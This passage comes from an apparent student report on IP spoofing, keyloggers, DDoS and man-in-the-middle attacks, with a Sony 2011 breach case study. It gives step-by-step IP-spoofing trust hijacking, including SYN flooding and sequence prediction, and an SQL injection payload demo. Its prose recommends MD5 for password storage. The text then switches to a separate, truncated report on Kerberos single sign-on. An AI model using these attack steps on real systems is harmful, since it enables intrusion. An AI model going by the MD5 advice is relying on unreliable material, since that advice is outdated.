the generator of all other attacks in the wireless network.” Some of the common types
of spoofing are email spoofing, ARP spoofing, content spoofing and IP spoofing. The
scope of this report focuses on IP spoofing.
IP Spoofing. IP spoofing is a “hijacking technique” that allows the attacker “to gain
unauthorized access to the computers by sending messages to a computer with an IP
address indicating that the message is sent from a trusted host.” It can be done
simply by replacing the source of the message with an internal or trusted IP address.
IP spoofing can be used to launch various attacks, common ones being blind spoofing,
non-blind spoofing and denial of service attacks.
Blind Spoofing. In a blind spoofing attack, the attacker, located outside the network,
“sends multiple packets to the target computer to obtain and analyze the different
sequences.” This allows the attacker to “predict the next number sequence” and deceive
the system by “injecting the data into the stream of packets without having to
authenticate him/herself.”
Denial of Service Attack. “To prevent a large-scale attack on a machine or a group of
machines from being detected, IP Spoofing is commonly used for DoS attacks.” Spoofing
the IP address can “extend the DoS attack as long as possible by increasing the
difficulties of tracing the source of the attack.”
Historical Perspective. The concept of IP spoofing was first discussed in academic
circles in the 1980s. S.M. Bellovin of AT&T Bell Labs, author of the April 1989
article “Security Problems in the TCP/IP Protocol Suite”, was one of the first to
identify IP spoofing as a real risk to computer networks. In the article, Bellovin
“describes how the creator of the now infamous Internet Worm, Robert Morris, figured
out how TCP created sequence numbers and forged a TCP packet sequence.”
Motivations. IP spoofing is employed “to commit online criminal activity” such as
spamming and denial of service (DoS) attacks. These attacks involve large amounts of
information transmitted over the network; using a bogus IP address as the source of
the messages hides their origin and prevents the attacker from being detected. IP
spoofing is also employed to breach network security. With a “bogus IP address that
mirrors one of the addresses on the network”, logging on to the network no longer
requires a username and password, and an attacker can “bypass any authentication
method and illegally access the network.”
How IP Spoofing is carried out.
Step 1: Detecting a Trusted System. The attacker must first identify a system that the
target system trusts, where the trust relationship is based on authentication by IP
address. This can be done using commands such as rpcinfo -p and showmount -e, through
social engineering, or by brute force.
Step 2: Blocking the Trusted System. Once the trusted system has been identified, the
attacker blocks it by performing a SYN flooding DoS attack on it, so that the
available memory on the trusted system is completely taken up. This prevents the
trusted system from responding to any SYN/ACK packet sent by the victim system.
Step 3: Getting the Final Sequence Number and Predicting the Succeeding Ones. After
the trusted system has been blocked, the attacker must obtain the sequence number of
the target system. To do so, “the attacker can connect to port 23 or port 25 (TCP
Ports) just before the launch of the attack and obtain the sequence number of the last
packet sent by the target system.”
Step 4: The Actual Attack. Once the sequence number has been obtained, the attacker is
ready to launch the actual attack. The attacker first sends a SYN packet carrying the
spoofed IP address to the victim system. “This SYN packet is addressed to the rlogin
port (513) and it requests for a trust connection to be established between the victim
system and the trusted system.” The victim system responds with a SYN/ACK packet sent
back to the trusted system; this SYN/ACK is discarded, since the trusted system has
been blocked. The attacker then sends an ACK back to the victim system. This ACK
message is crafted with a spoofed address so that it seems to originate from the
trusted system, and “it also includes an ACK number whose value is the predicted
sequence number plus 1.” If everything succeeds, a trust relationship is established
between the victim and the attacker. (Refer to Appendix D: Spoofing, Fig. 6)
3.4 Keylogger
A keylogging attack, also known as a keystroke logging attack, is a type of malware
attack in which malicious attackers use a keylogger to log the keystrokes on a
victim’s computer. The keylogger can come in the form of a hardware device or a
program that steals sensitive information and tracks user input, including the URLs
the user visits. Keylogger attacks are a threat to many organizations and personal
activities, as information can be captured before encryption is performed (refer to
Appendix E: Keylogger, Fig. 9).
The keyboard is still the main method of entering input on a computer, so an attacker
can easily obtain valuable information by recording keystrokes. Furthermore, an
attacker can predict a user’s behavior from the typing order when the user logs into
an email account. The keystrokes are stored in a log file on the compromised machine
and sent to the attacker without the user’s knowledge. (Refer to Appendix E:
Keylogger, Fig. 10)
Historical Perspective. An early keylogger program is known to have been written by
Perry Kivolowitz while he was an undergraduate; the source code was posted to Usenet
newsgroups on November 17, 1983. [34] Although attackers use keyloggers to carry out
cybercrime, keyloggers can also be used for law enforcement purposes.
Motivations. The purpose is to steal sensitive information such as usernames,
passwords, credit card numbers, bank account numbers and the like, in order to gain
access to an organization’s confidential information. Blackmail of the organization
often follows once attackers have access to such information.
How Keylogging is carried out. Common keyloggers include software keyloggers and
hardware keyloggers, each with its own way of carrying out the keylogging.
Software Keylogger. There are three types of software keyloggers: kernel-based,
hook-based and user-space. A software keylogger captures data remotely and can affect
a large number of machines once the program is installed on them. When a user opens a
file that has been infected with the virus, the program is installed on the computer
automatically, without the user noticing, capturing the keystrokes between the
keyboard interface and the operating system (OS).
Hardware Keylogger. A hardware keylogger uses a connector, such as a PS/2 (refer to
Appendix E: Keylogger, Fig. 11) or USB keylogger (refer to Appendix E: Keylogger,
Fig. 12), plugged in between the keyboard and the computer to capture keystrokes. Once
the keylogger is connected to the machine, it starts recording the keystrokes and
stores them in the device’s own storage. A hardware keylogger requires physical access
both to attach the connector to the machine and to retrieve the logged data.
4. System Attacks Classifications
4.1 CIA Classification (Information Security Model)
The CIA Triad security model is used to identify which component of the triad is
affected by each system attack. Classifying the system attacks under the CIA triad
gives us a better understanding of the security components that are breached. Brief
definitions of the CIA components are stated below.
Confidentiality: sensitive and confidential information is protected from unauthorized
access
Integrity: data is protected from modification and deletion
Availability: systems, resources and services must be available at all times when
needed
System Attacks and their CIA Classification

Distributed Denial of Service (DDoS): Breach of Availability. In our opinion, a DDoS
attack breaches the availability of the data. Once the DDoS attack is successfully
launched, the target server is flooded with requests and becomes inoperable. The
service or data becomes unavailable, preventing legitimate users from using a
specified network resource such as a website, web service, or computer system.

IP Spoofing: Breach of Confidentiality, Integrity and Availability. In our opinion, IP
spoofing breaches the confidentiality, integrity and availability of the data.
Firstly, integrity is breached because an IP spoofing-based attack usually requires
the attacker to modify the source of the message to make it appear to have originated
from a trusted source. Secondly, confidentiality is breached because, once the
attacker has successfully launched an IP spoofing-based attack, they can gain
unauthorized access to a computer system or network and thereby obtain confidential
information. Lastly, availability is breached because IP spoofing can be used to
launch denial of service attacks, and the spoofed IP address increases the difficulty
of tracing the source of the attack.

Keylogging: Breach of Confidentiality. In our opinion, keylogging breaches the
confidentiality of the data. Once a keylogging attack is successfully launched, the
attacker can log the keystrokes on the victim’s computer and thereby gain unauthorized
access to confidential information.

Man-in-the-Middle (MITM): Breach of Confidentiality, Integrity and Availability.
Confidentiality is breached because communication among computers can be eavesdropped
by the attacker, who thereby gains unauthorized access to the data communicated across
the different systems. Integrity is breached because the attacker can intercept a
communication and modify the message before sending it on to its destination.
Availability is also breached because the attacker can intercept, destroy or modify
messages, with the aim of ending the entire communication among the different
computers.
4.2 Probability of Occurrence Classification
This classification identifies how likely each system attack is to be carried out. The
probability of occurrence is expressed in qualitative terms, in one of three
categories: ‘Frequent’, ‘Occasional’ and ‘Remote’. The definitions of the three
probabilities are given below.
Frequent: the system attack is likely to occur often
Occasional: the system attack may occur once or a few times
Remote: the system attack is unlikely to occur, but the possibility of occurrence
cannot be ruled out
System Attacks and their Probability of Occurrence

Distributed Denial of Service (DDoS): Frequent. In our opinion, DDoS attacks occur quite frequently as they can be performed easily, with minimal resources and expertise needed. Due to the growing trend of do-it-yourself attack tools and botnets for hire, even a computer novice can execute a successful DDoS attack. The ease of executing this attack, and the amount of damage it can bring, give attackers a greater incentive to launch DDoS attacks.

IP Spoofing: Remote. In our opinion, IP Spoofing-based attacks do not occur frequently, owing to their high complexity: they usually involve a large amount of resources and a high level of technical knowledge from the attackers. Although the complexity of the attacks is high, it is still possible for attackers to launch an IP Spoofing-based attack if they have managed to exploit certain vulnerabilities and are equipped with the necessary resources and technical expertise.

Keylogging: Frequent. In our opinion, keylogging attacks can take place very frequently, because a keylogging attack can be performed very easily by any staff member in the organization with just a piece of hardware. Once this hardware is plugged into the connector, it starts to monitor the user's keystrokes.

Man-in-the-Middle (MITM): Occasional. In our opinion, MITM attacks occur occasionally. MITM attacks can be relatively easy to perform if the attacker knows the specific technique required. In addition, because of the huge benefits the attacker can receive from a MITM attack, such as obtaining and accessing the confidential information that flows between computers, attackers would not want to miss out on such an opportunity.
4.3 Probability of Detection Classification
This classification identifies the probability of users detecting such attacks in their system. The probability of detection is described as High, Medium or Low. With the probability of detection, we can also identify the potential to reduce or prevent a computer attack before it propagates and causes more damaging effects. The reasons below describe what constitutes High, Medium or Low for each attack classification.
Probability of Detection Classification

Distributed Denial of Service (DDoS): Low. Often, the communication between the master and the agents is so well hidden that it becomes difficult even to locate the master computer. Techniques are frequently employed to intentionally hide the identity and location of the master within the DDoS network. With such techniques in place, it is much harder to identify, detect or analyze an attack in progress. More often than not, administrators do not even know that their systems have been affected.

IP Spoofing: Low. The probability of detecting a spoofed IP packet is low because the source address has been modified by the attacker. This makes it more difficult for network-monitoring software to detect the source of the attack.

Man-in-the-Middle attack: Low. Detecting a man-in-the-middle attack requires technical measures such as complex cryptographic protocols and checking whether the certificate authority is trusted. Users who lack this level of technical skill may not be able to detect that their actions are being monitored by the attacker.

Keylogger (hardware): Low. A hardware keylogger is often not easily detectable due to its small physical size. It also cannot be detected by any software program; only a physical examination of the keyboard cable will reveal it. Thus, if the user does not do any probing, the keylogger will continue monitoring the user's keystrokes.
4.4 Severity Classification (Complexity of Attack and Scale of Damage)
This classification determines the severity resulting from the system attacks. The ranking of severity is derived from the weighted scores of the 'Scale of Damage' and 'Complexity of Attack' criteria. We would also like to find out whether attackers require any prior knowledge of computer networks or systems to perform such attacks. Scale of Damage covers the types of resources affected by the outcome of an attack and how it affects the organization as a whole. Complexity of Attack refers to the technical skills, knowledge and expertise required by the attackers to launch the attack. The total weighted score gives a better insight into each attack's level of complexity, how difficult it is to carry out, and how impactful its scale of damage can be to society or an organization. (Refer to Appendix F for more details on the reasoning)
System Attacks and their Weighted Severity Scores

Attacks                       | Scale of Damage (60%) | Complexity of Attack (40%) | Weighted Score (%)       | Overall Ranking
Distributed Denial of Service | 1                     | 0.5                        | 1*0.6 + 0.5*0.4 = 80%    | 2
IP Spoofing                   | 0.8                   | 1                          | 0.8*0.6 + 1*0.4 = 88%    | 1
Man-in-the-Middle             | 0.6                   | 0.8                        | 0.6*0.6 + 0.8*0.4 = 68%  | 3
Keylogger (hardware)          | 0.4                   | 0.3                        | 0.4*0.6 + 0.3*0.4 = 36%  | 4
Total                         | 2.8                   | 2.6                        | 272%                     |
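The weighted scores in the table can be recomputed mechanically. The sketch below is purely illustrative (the dictionary keys are our own shorthand for the four attacks); the weights and per-attack values are taken from the table above:

```python
# Recompute Section 4.4's weighted severity scores.
# Weights: Scale of Damage 60%, Complexity of Attack 40%.
WEIGHTS = {"damage": 0.6, "complexity": 0.4}

scores = {
    "IP Spoofing": {"damage": 0.8, "complexity": 1.0},
    "DDoS":        {"damage": 1.0, "complexity": 0.5},
    "MITM":        {"damage": 0.6, "complexity": 0.8},
    "Keylogger":   {"damage": 0.4, "complexity": 0.3},
}

def weighted_score(s):
    return s["damage"] * WEIGHTS["damage"] + s["complexity"] * WEIGHTS["complexity"]

# Sort attacks by weighted score to reproduce the overall ranking.
ranking = sorted(scores, key=lambda a: weighted_score(scores[a]), reverse=True)
for attack in ranking:
    print(f"{attack}: {weighted_score(scores[attack]):.0%}")
```

Running this reproduces the ranking in the table: IP Spoofing first at 88%, then DDoS, MITM and the hardware keylogger.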
5. Case Study: Sony Corporation
In this section, we discuss the various vulnerabilities that were overlooked by Sony Corporation and how those weaknesses paved the way for attacks to be launched against Sony. Some of these attacks have been discussed above. This section also provides our opinions on countermeasures that Sony could take to strengthen its security.
5.1 Background of Sony Attacks
2011 has been a bad year for Sony Corporation and its users, as the organization has been the victim of a series of security breaches. A group of hackers known as Lulz Security hacked into Sony's systems. Sony was forced to shut down its systems to resolve the crisis, and even had to offer users free credits for online games as a form of compensation. In the following sections, we discuss the types of attacks Sony faced, suggest countermeasures, and relate them to some of the system attacks discussed in the first section.
5.2 Sony Case Study Classification
The goal of this classification is to identify the potential vulnerabilities associated with the system attacks, the types of attacks that stemmed from those vulnerabilities, and the attacks' corresponding consequences. In the case of Sony Corporation, research and analysis had to be carried out to determine which areas of weakness in Sony's system environment might be exploited. With the list of vulnerabilities we identified, it was possible to derive the attacks and their associated consequences. The consequences describe the impact on Sony's business and operations if the system attacks were to occur.
Classifications for Sony's Case Study

Vulnerability/weakness in Sony's system: Sony failed to patch its servers regularly.
Attack Sony encountered: Distributed Denial of Service (DDoS).
Consequences: Disruption of services and great inconvenience to normal users due to the high volume of requests flooding the server side.

Vulnerability/weakness in Sony's system: Sony did not perform adequate testing on its database.
Attack Sony encountered: SQL Injection.
Consequences: Data such as users' personal information and Sony's website data were accessed and manipulated, resulting in website defacement.

Vulnerability/weakness in Sony's system: Sony allowed the reuse of the same password across different Sony services and other websites.
Attack Sony encountered: Brute Force Attack.
Consequences: An attacker could obtain usernames and passwords from other sources and use them to launch a successful brute force attack.

Vulnerability/weakness in Sony's system: Sony did not encrypt the data in its database (e.g. passwords were kept in plaintext form) and did not implement a password strength check.
Attack Sony encountered: Data Theft.
Consequences: As the data was unencrypted, an attacker could take advantage of this vulnerability and steal the data, and consequently log in to Sony users' accounts using the stolen information. The database server could also be hacked easily, since with no strength check enforced, the passwords chosen by users may be easy to decipher.
5.3 Types of Attacks according to the Sony Case
5.3.1 Distributed Denial of Service (DDoS)
DDoS attacks targeted several services, such as the Sony PlayStation Network, its Qriocity music streaming service, and Sony Online Entertainment. The large volume of traffic sent caused the web servers to become unresponsive. The attack caused disruption, making it difficult for customers to use the services; this caused huge financial losses, and Sony's goodwill was adversely affected. Anonymous, a hacktivist group responsible for the attacks, used botnets and a simple DDoS tool called the Low Orbit Ion Cannon (LOIC) to perform the attacks. From the Sony case study, we can see how the DDoS attack (discussed in the first section) has been put into practice and how it affected the whole organization.
5.3.2 SQL Injection
The hackers used a SQL injection attack to access and expose data on Sony. SQL injection exploits vulnerabilities in input validation to run arbitrary commands on the database: it allows an attacker to insert a database query that fools the database server into running malicious code, revealing sensitive information or otherwise compromising the server. In the case of Sony, the hackers accessed the passwords, email addresses, home addresses and dates of birth of nearly one million users, and also stole all the admin details of Sony Pictures, thus compromising the privacy of the site visitors' personal information. Often, the attacker can take complete control of the underlying operating system of the SQL server or web application, and ultimately the web server itself. From this attack on Sony, we can see that besides the four system attacks mentioned in the first section, many other new system attacks are emerging that a large corporation may be vulnerable to. Hence, large corporations such as Sony must be constantly prepared for upcoming system attacks that can cause them great damage and losses.
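The input-validation flaw described above can be demonstrated with Python's built-in sqlite3 module. The users table and the malicious input string below are invented for illustration; the parameterized query at the end shows the standard defence:

```python
import sqlite3

# Toy database; the table and credentials are invented for illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

malicious = "' OR '1'='1"  # classic injection payload

# Vulnerable: user input concatenated straight into the SQL string,
# so the OR '1'='1' clause matches every row in the table.
rows_vuln = conn.execute(
    "SELECT * FROM users WHERE name = '" + malicious + "'"
).fetchall()

# Safe: a parameterized query treats the input purely as data,
# so no row has the literal name "' OR '1'='1".
rows_safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (malicious,)
).fetchall()

print(len(rows_vuln), len(rows_safe))  # 1 0
```

The vulnerable query leaks every row; the parameterized query returns none, because the driver never interprets the input as SQL.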
5.3.3 Brute Force Attack
Sony Corporation also encountered brute force attacks, in which around 93,000 Sony user accounts were compromised, forcing Sony to lock those accounts and reset their passwords.
According to data released by Lulz Security, about 92% of Sony users used the same password on multiple Sony websites. Some of the common passwords used were "seinfeld", "123456" and "password". From the suggested vulnerabilities, it can be deduced that Sony Corporation did not incorporate a strong defense mechanism against possible attacks; one example is the poor password policy enforced on its users. This made Sony a susceptible, high-value target for hackers conducting brute force attacks on those accounts.
Since users often have the habit of reusing the same password for their other accounts, such as their email, it becomes that much easier for a hacker to profit from a keylogging attack, especially given the low probability of it being detected by any software program or by the user. By obtaining the database server password, the hacker can obtain all the users' emails and passwords, and can then use the resulting list to carry out a brute force attack, trying the different possible combinations to gain access to Sony services, namely the PlayStation Network and Sony Online Entertainment.
5.3.4 Data Theft
Because Sony stored data such as user passwords unencrypted in its databases, attackers who gained access were able to steal that data directly. Personal information including email addresses, home addresses and dates of birth was exposed, and the stolen credentials could then be used to log in to users' accounts across Sony's services. This shows how the lack of encryption, identified as a vulnerability in Section 5.2, turned a single intrusion into a large-scale theft of user data.
5.3.4.1 Countermeasures
5.3.4.1.1 Distributed Denial of Service
Establish a Back-Up "Mirror" Website. In our opinion, Sony should establish a back-up "mirror" website hosted with a different web hosting provider. In the event of a DDoS attack, Sony can replace the affected websites with the back-up "mirror" website. This ensures that Sony's customers can still make use of its services even if a website has been hit by a DDoS attack.
5.3.4.1.2 SQL Injection
White Hat Hacker. In our opinion, Sony should hire a white hat hacker, a computer expert specializing in penetration testing, to find and fix the vulnerabilities in its systems. It would cost far less to perform thorough penetration tests than to suffer the loss of trust, fines, disclosure costs and reputational damage these incidents have caused. Proper testing of the application will help prevent such SQL injections.
5.3.4.1.3 Brute Force Attack
Incremental Delay. Adding a pause after each failed login attempt can help Sony deal with brute force attacks. This method is known as incremental delay: the system tracks login failures on a "user session instead of authentication credential basis." It works by adding one extra second to the response time each time the user fails to log in. For example, if the user fails to log in on the first attempt, the response is delayed by one second; if the user fails a second time, the response is delayed by two seconds, and so on for subsequent attempts.
By adding a few seconds to the response time, this helps to slow down a brute force attack and, most importantly, users will not feel irritated if they accidentally mistype their password. Compared with disabling accounts after multiple tries, this method is more practical, as users do not have to wait for a period of time before they can reactivate their account.
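A minimal sketch of this incremental-delay scheme is shown below. The function and variable names (check_login, failed_attempts) and the in-memory session store are our own illustrative assumptions, not Sony's implementation:

```python
import time

# Hypothetical in-memory store of failed attempts, keyed by user session.
failed_attempts = {}

def check_login(session_id, password, real_password="hunter2"):
    """Respond one second slower for every previous failure in this session."""
    delay = failed_attempts.get(session_id, 0)
    time.sleep(delay)  # 0s after no failures, 1s after one, 2s after two, ...
    if password == real_password:
        failed_attempts.pop(session_id, None)  # reset the counter on success
        return True
    failed_attempts[session_id] = delay + 1
    return False
```

Because the delay grows linearly per session, an automated attacker cycling through a dictionary is slowed dramatically, while a legitimate user who mistypes once pays only a one-second penalty.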
5.3.4.1.4 Data Theft
Perform hashing of passwords. Since the data theft attack occurred mainly because of unencrypted data, Sony Corporation should consider hashing its users' passwords with a hashing algorithm such as MD5 before the passwords are stored in the database. Hashing would turn the user password "my_password" into something like "0x22cd3f2e3f2e56f7ecf5". Since hashing is a one-way function, it is very hard for an attacker to recover the password from the hash, even if the attacker has managed to obtain the password hashes from the database server. In addition, if Sony Corporation is using a Unix system, it should also consider incorporating a salt for each user in the database to make it more secure. "Salt is a two-character string that is stored in the password file along with the encrypted password. With salt, the same password can be encrypted in 4096 ways." If salt is not used, it is easier for the attacker to "construct a reverse dictionary where it is able to convert the encrypted password back to its original form." Finally, the use of hashing and salt will prevent a user's password from being easily obtained and revealed in plaintext by the attacker.
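The hash-and-salt scheme described above can be sketched as follows. The helper names are hypothetical, and MD5 is used only because the text proposes it; a real deployment today would prefer a dedicated password-hashing function such as bcrypt or scrypt:

```python
import hashlib
import os

def hash_password(password, salt=None):
    # Random per-user salt; the text describes a two-character Unix salt,
    # but any random string serves the same purpose.
    if salt is None:
        salt = os.urandom(8).hex()
    digest = hashlib.md5((salt + password).encode()).hexdigest()
    return salt, digest

def verify_password(password, salt, digest):
    # Recompute the salted hash and compare; the plaintext is never stored.
    return hashlib.md5((salt + password).encode()).hexdigest() == digest

salt, stored = hash_password("my_password")
print(verify_password("my_password", salt, stored))  # True
print(verify_password("123456", salt, stored))       # False
```

The database keeps only (salt, digest) per user; the salt forces an attacker to build a separate reverse dictionary for every user rather than one for the whole table.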
6. Conclusion
In today's technology-driven marketplace, many businesses rely on the internet to take advantage of web-based services in order to stay competitive. However, they cannot rule out the possibility of being targeted, as attackers are becoming smarter and stealthier in their methods. As threats become more sophisticated and prevalent, it is fundamental for businesses to defend against computer network attacks and protect their network security.
The attacks that Sony Corporation faced hold an important lesson for organizations and end users. In this advanced technological world, it is very easy to become the victim of a cybercrime. As end users, we should learn to protect ourselves by not becoming easy targets for hackers, and organizations should likewise protect their customers' information.
References
1. Kessler, G. C. (2000, November). Distributed denial-of-service. Retrieved from http://www.garykessler.net/library/ddos.html
2. Farrapos, S., Gallon, L., & Owezarski, P. (2005, April). Network security and DoS attacks. Retrieved from http://spiderman2.laas.fr/METROSEC/Security_and_DoS.pdf
3. What is IP spoofing and how does it work? (n.d.). Retrieved from http://www.spamlaws.com/how-IP-spoofing-works.html
4. Velasco, V. (2000, November 21). Introduction to IP spoofing. Retrieved from http://www.sans.org/reading_room/whitepapers/threats/introduction-ip-spoofing_959
5. IP spoofing. (n.d.). Retrieved from http://www.andhrahackers.com/forum/hacking-tut/ip-spoofing/?wap2
6. Hassell, J. (2006, June 8). The top five ways to prevent IP spoofing. Retrieved from http://www.computerworld.com/s/article/9001021/The_top_five_ways_to_prevent_IP_spoofing
7. Wu, T., Chung, J., Yamat, J., & Richman, J. (n.d.). The ethics (or not) of massive government surveillance. Retrieved from http://www-cs-faculty.stanford.edu/~eroberts/cs201/projects/ethics-of-surveillance/tech_keystrokelogging.html
8. Wikipedia. (n.d.). Keystroke logging. Retrieved from http://en.wikipedia.org/wiki/Keystroke_logging
9. Lien, C., & Chen, C. (n.d.). Keylogger defender. Retrieved from http://www.seas.ucla.edu/~chienchi/reports/CS236_keydef_pp1.pdf
10. Sony Corporation. (2011, October 12). Sony global - announcement regarding unauthorized attempts to verify valid user accounts on PlayStation®Network, Sony Entertainment Network and Sony Online Entertainment. Retrieved from http://www.sony.net/SonyInfo/News/Press/201110/11-1012E/index.html
11. Sullivan, B. (n.d.). Preventing a brute force or dictionary attack: How to keep the brutes away from your loot. Retrieved from http://www.infosecwriters.com/text_resources/pdf/Brute_Force_BSullivan.pdf
12. Technical Info. (n.d.). The phishing guide (part 1): Understanding and preventing phishing attacks. Retrieved from http://www.technicalinfo.net/papers/Phishing.html
Appendices
Appendix A: System Attack Frequency
Fig. 1. System Attack Frequency [1]
Appendix B: Distributed Denial of Service
Fig. 2. Intruder finding a site to compromise [2]
Fig. 3. Compromised system with DDoS daemon [2]
Fig. 4. Flooded Victim‟s Site [2]
Appendix C: Man-in-the-Middle
Fig. 5. Phishing Attack [10]
Appendix D: Spoofing
Fig. 6. The Actual Attack [23]
Appendix E: Keylogger
Fig. 7. How Keylogging works [32]
Fig. 8. Sample Log File Content [33]
Fig. 9. PS/2 Keylogger [36]
Fig. 10. USB Keylogger [37]
Appendix F: System Attack Classification

System Attacks and their Estimated Scale of Damage

Distributed Denial of Service: Scale of Damage (60%) = 1. The scale of damage done by DDoS can be very large, as it can affect the availability of many big-name online sites. For example, the Internet portal Yahoo! became the victim of a DDoS attack in which it was inaccessible for 3 hours and suffered a loss of e-commerce and advertising revenue amounting to about $500,000.

IP Spoofing: Scale of Damage (60%) = 0.8. The scale of damage done by IP Spoofing-based attacks can be quite large. Once an IP Spoofing-based attack is successfully launched, the attacker can gain unauthorized access to the entire corporate network and steal or compromise all of the corporation's confidential information.

Man-in-the-Middle: Scale of Damage (60%) = 0.6. The attacker can hijack credentials used in two-factor authentication during online banking. Online banking customers are robbed of their online identities and may incur financial losses if the attacker performs fraudulent transactions directly with the bank using the customers' accounts.

Keylogger (Hardware): Scale of Damage (60%) = 0.4. Compared with the other attacks, the scale of damage of a keylogger attack may not be as large, because it only logs sensitive information on one particular computer, so not much information may be recorded. Also, different levels of employees have different access rights, so the attacker may not be able to record the username and password protecting the most confidential information.

Total: 2.8

System Attacks and their Associated Complexity

Distributed Denial of Service: Complexity of Attack (40%) = 0.5. A DDoS attack is not very complex. It just needs a vulnerability in the system to exploit, for instance a stolen account that the attackers have access to; the intruder can use this to load DDoS programs onto the host.

IP Spoofing: Complexity of Attack (40%) = 1. IP Spoofing is not an attack in itself, but rather a hijacking technique that cyber-terrorists use to launch various attacks. However, attacks employing IP Spoofing can be very complex. To launch such an attack, the attacker must first have technical knowledge of how the OSI layers, the TCP/IP suite and the IP structure work, and must also understand the flaws and security problems of the TCP/IP suite. In addition, any IP Spoofing-based attack involves many steps: attackers have to find valid IP and TCP headers in order to forge and inject the right IP packets and gain unauthorised access to the computer, system and network.

Man-in-the-Middle: Complexity of Attack (40%) = 0.8. Since MITM attacks include different types of techniques, the complexity ranges from easy to difficult. An attacker requires knowledge of the specific technique used to perform the MITM attack (e.g. DNS, ARP, HTTP or SSL). Software such as SSLStrip and Cain & Abel can also be used to carry out MITM attacks. For a simple MITM attack, a small web server (to host a phishing website and capture customers' credentials) would suffice.

Keylogger (Hardware): Complexity of Attack (40%) = 0.3. Keylogger attacks are not very complex, as a hardware keylogger is the simplest approach to carry out. Attackers only need to know which port to plug the connector into, and the attack does not require many resources: attackers can install the keylogger on a machine easily, without much effort, using the connector.

Total: 2.6

Scale of Damage and Complexity of Attack

Severity Level | Range
High           | 0.8 - 1
Medium         | 0.5 - 0.7
Low            | 0.1 - 0.4
Appendix G: Other References
13. Ponemon Institute. (2011, August). Second annual cost of cyber crime study. Retrieved from http://www.arcsight.com/collateral/whitepapers/2011_Cost_of_Cyber_Crime_Study_August.pdf
14. Hines, E., & Gamble, J. (2002, February 25). Non-blind IP spoofing and session hijacking: A diary from the garden of good and evil. Retrieved from http://flur.net/archive/research/non-blind-hijacking.pdf
15. TCP/IP suite weaknesses. (2006, November 11). Retrieved from http://mudji.net/press/?p=152
16. Bao Ho & Toan Tai Vu (2003). IP spoofing (A study on attacks and countermeasures). Retrieved from http://www.docstoc.com/docs/45752165/IP-spoofing
17. Olza, T. (2008, April). Keystroke logging (keylogging). Retrieved from http://adventuresinsecurity.com/images/Keystroke_Logging.pdf
18. SpyCop. (n.d.). Hardware keylogger detection. Retrieved from http://spycop.com/keyloggerremoval.htm
19. KeyCarbon. (n.d.). Keystroke recorders for USB keyboards ("KeyCarbon USB"). Retrieved from http://www.keycarbon.com/products/keycarbon_usb/overview/
20. Schneier, B. (2008, November 10). Schneier on security: Aspidistra. Retrieved from http://www.schneier.com/blog/archives/2008/11/aspidistra.html
21. Wikipedia. (n.d.). Aspidistra (transmitter). Retrieved from http://en.wikipedia.org/wiki/Aspidistra_(transmitter)
Report for the Study of Single-Sign-On (SSO), an
introduction and comparison between Kerberos based
SSO and OpenID SSO
Xiao Zupao
Abstract. Single-Sign-On is a useful technique that allows users to authenticate themselves to a system only once, after which they are logged in automatically. This saves a great deal of login time and also reduces the risk of security problems such as phishing. This report gives a brief introduction to traditional Kerberos-based SSO and to a newer kind of SSO called OpenID SSO, and compares the two techniques in various respects.
Keywords: Single-Sign-On, Kerberos, OpenID.
1 Introduction
Single-sign-on is a technique that links access to multiple independent systems. It allows users to log in only once and then access all the independent systems without logging in manually.
1.1 Benefits
Single-sign-on benefits users in the following ways:
 It reduces the time spent typing in usernames and passwords.
 It reduces password fatigue: with SSO, the user only needs to remember one username and password for all the systems involved.
 It reduces the success of phishing, since users never need to type in their password when asking for a service.
1.2 Various implementations
Currently there are many ways to implement SSO; I will briefly introduce four of them in this part:
 Kerberos based SSO
Kerberos-based SSO maintains a centralized authentication server that stores all users' information. The user first authenticates to this server, and the server gives back a ticket. The user can then use the ticket to request services from other independent servers associated with the centralized authentication server. The detailed process is described later in this report.
 Smart-Card based SSO
Users first insert the smart card and type in a password to authenticate themselves. Later, when they want to request a service, they just insert the card and the authentication is done by the SSO server. Smart-card based SSO needs a Kerberos Key Distribution Center (KDC). As I see it, the process for smart-card based SSO is just the same as for Kerberos based SSO, except that it needs a card, which makes the initial authentication more secure. But what if the user authenticates first and then loses the card?
 Integrated Windows Authentication
Integrated Windows Authentication is a term associated with Microsoft's products. It is used most commonly for the automatically authenticated connection between Microsoft Internet Information Services and Internet Explorer.
Integrated Windows Authentication does not prompt for a user name and password at first; instead, the browser exchanges the current user's credentials with the web server through a cryptographic exchange. If this fails, it prompts for a user name and password. For Windows NT-based SSO the Kerberos protocol is also involved, and other protocols are implemented to ensure that the system still works correctly if Kerberos fails.
 OpenID SSO
OpenID SSO is totally different from the above implementations. It does not need a centralized server to identify the user and establish the authentication between the user and the service server. Users create an account with their preferred OpenID identity provider, and with this account the user can sign on to any website that accepts OpenID authentication. I will introduce the detailed process later in this report.
2 Kerberos based SSO
2.1 Terminology¹
 Key Distribution Center (KDC)
The KDC is a trusted third party for the client and the service server (SS) from which the client requests a service. It consists of two parts, namely the Authentication Server and the Ticket Granting Server.
 Authentication Server (AS)
The AS is the server that authenticates the user's identity. It makes sure that you are you, and not anyone else.
 Kerberos tickets
A Kerberos ticket is issued by the AS and encrypted with the server key. It contains a session key, the corresponding user's name, and a time stamp indicating when the ticket is valid.
 Ticket Granting Server (TGS)
The TGS issues additional tickets.
 Ticket Granting Ticket (TGT)
The TGT is returned by the AS the first time the client authenticates to it. The client uses this TGT to obtain additional tickets from the TGS for the SS. A TGT is short-lived, typically 8 hours. It contains the client ID, the client network address, the ticket validity period, and the client/TGS session key.
 Server key
The server key refers to the key shared by the AS and the service-providing server.
 Session key
A session key is a newly generated key with a time stamp. "Newly" means it is generated every time the user wants to request a new service.
 User
"User" refers to the person who uses the client machine to ask for services.
 Client
"Client" refers to the machine that the user uses.

¹ Reference: http://en.wikipedia.org/wiki/Kerberos_(protocol)
2.2 How it works?²
1. First stage: the user authenticates to the AS
 The user enters a username and password on the client machine.
 The client hashes the password, and this becomes the private key for the user/client.
 The client sends a plain-text message containing the user name to the AS to request services.
 The AS checks whether the user name is in its database. If it is, the AS returns two messages:
1. The client/TGS session key, encrypted using the secret key of the client/user. (This secret key is pre-stored in the AS, not provided by the client.)
2. The TGT, which is encrypted using the TGS's private key.
 Upon receiving the two messages, the client tries to decrypt the first message using the private key generated previously. If it can be decrypted successfully, the user is the right person. After decrypting the first message, the client has the session key for communicating with the TGS.
